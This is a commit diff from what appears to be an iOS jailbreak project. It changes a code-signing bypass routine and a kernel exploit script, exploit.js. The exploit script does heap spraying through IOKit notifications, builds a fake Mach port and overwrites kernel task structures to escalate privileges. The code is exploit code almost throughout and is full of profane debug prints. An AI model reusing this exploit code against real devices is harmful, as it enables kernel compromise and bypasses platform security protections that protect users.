summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
Diffstat
-rw-r--r--src/js/csbypass.js18
-rwxr-xr-xsrc/js/kexp/exploit.js74
2 files changed, 37 insertions, 55 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 3065099..12388a0 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -25,27 +25,23 @@ function memcpy_exec(dst, src, size) {
var width = malloc(4);
var height = malloc(4);
var pitch = malloc(4);
- var pixel_format = malloc(5);
+ var pixel_format = malloc(8);
write_u32(width, PAGE_SIZE / (16 * 4));
write_u32(height, 16);
write_u32(pitch, read_u32(width) * 4);
write_u32(pixel_format, 0x42475241); // ARGB
write_u32(pixel_format + 4, 0x0); // ARGB
printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue"));
- dict = callnarg(CFDictionaryCreateMutable_addr + get_dyld_shc_slide(), 0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
+ dict = CFDictionaryCreateMutable(0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
printf("dict: %p\n", dict);
- var test = callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pitch);
+ var test = CFNumberCreate(0, kCFNumberSInt32Type, pitch);
printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
- call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
- printf("fuck1\n");
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
- printf("fuck2\n");
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
- printf("fuck3\n");
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
- printf("fuck4\n");
+ CFDictionarySetValue(dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
printf("fuck you\n");
printf("%d\n", callnarg(my_IOSurfaceAcceleratorCreate, 0, 0, accel));
}
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 419f5c7..e854ba0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -185,13 +185,18 @@ function spray(dict, size, port) {
var ret = 0;
var master = shit_heap(4);
- host_get_io_master(mach_host_self(), master);
- io_service_add_notification_ool(master, "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+ ret = host_get_io_master(mach_host_self(), master);
+ printf("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));
+// scall("printf", "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
+ ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+ printf("yahtzee %d (%s)\n", ret, mach_error_string(ret));
if (ret == KERN_SUCCESS) {
ret = read_u32(err);
}
+ printf("yahtzee2 %d (%s)\n", ret, mach_error_string(ret));
+
return ret;
}
@@ -370,36 +375,6 @@ function mach_ports_lookup_shit() {
// return 0x42603;
}
-function mach_ports_lookup_shit_dealloc() {
- printf("fuck\n");
- var arrz = shit_heap(4);
- printf("fuck\n");
- write_u32(arrz, 0);
- printf("fuck\n");
- var sz = shit_heap(4);;
- printf("fuck\n");
- write_u32(sz, 3);
- printf("fuck\n");
-// var mts = mach_task_self();
- printf("fuck\n");
- calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
- puts("helo");
- printf("mpl success\n");
- scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
- printf("mpl success\n");
-
- for (var i = 0; i < read_u32(sz); i++) {
- if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
- printf("destroying %p\n", read_u32(read_u32(arrz) + (i << 2)));
- mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
- printf("destroyed %p\n", read_u32(read_u32(arrz) + (i << 2)));
- }
- }
-
- return read_u32(read_u32(arrz) + 8);
-// return 0x42603;
-}
-
var kernel_task_addr = 0;
function get_kernel_task() {
var ret = 0;
@@ -469,18 +444,20 @@ again: while (true) {
sched_yield();
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
- spray(big_buf, big_size, dummy);
+ var dummy = shit_heap(4);
+ spray(big_buf, read_u32(big_size), dummy);
}
sched_yield();
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM; i++) {
// for (var i = 0; i < 8; i++) {
+ var dummy = shit_heap(4);
if (i % 4 == 0) {
printf("spray_ports %d\n", i);
}
write_u32(fp + (i << 2), spray_ports(1));
- spray(small_buf, small_size, dummy);
+ spray(small_buf, read_u32(small_size), dummy);
}
sched_yield();
@@ -489,15 +466,23 @@ again: while (true) {
release_port_ptrs(read_u32(fp + (i << 2)));
}
+// return;
+
+
+ var arrz = shit_heap(16);
+ write_u32(arrz, 0);
+ write_u32(arrz + 4, 0);
+ write_u32(arrz + 8, 0);
+ write_u32(arrz + 12, 0);
+ var sz = shit_heap(4);
+ write_u32(sz, 3);
+// mach_ports_lookup_shit_dealloc();
+ var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
+ mach_ports_lookup(mach_task_self(), arrz, sz);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ printf("mpl success\n");
- var arrmpt = shit_heap(16);
- write_u32(arrmpt, 0);
- write_u32(arrmpt + 4, 0);
- write_u32(arrmpt + 8, 0);
- write_u32(arrmpt + 12, 0);
- mach_ports_lookup_shit_dealloc();
- var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
- mach_ports_lookup_shit();
+ var fake_port = read_u32(read_u32(arrz) + 8);
printf("%d %s\n", ret__, mach_error_string(ret__));
printf("r3gister done\n");
// while (true) {
@@ -509,7 +494,7 @@ again: while (true) {
/*
* BEGIN JANK FUCKING HACK
*/
- var fake_port = mach_ports_lookup_shit();
+// var fake_port = mach_ports_lookup_shit();
printf("fuck\n");
printf("%x\n", fake_port);
printf("fuck\n");
@@ -519,7 +504,8 @@ again: while (true) {
printf("fuck\n");
write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
- write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+ write_u32(ptr, 0x73707621);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:49:27 +0000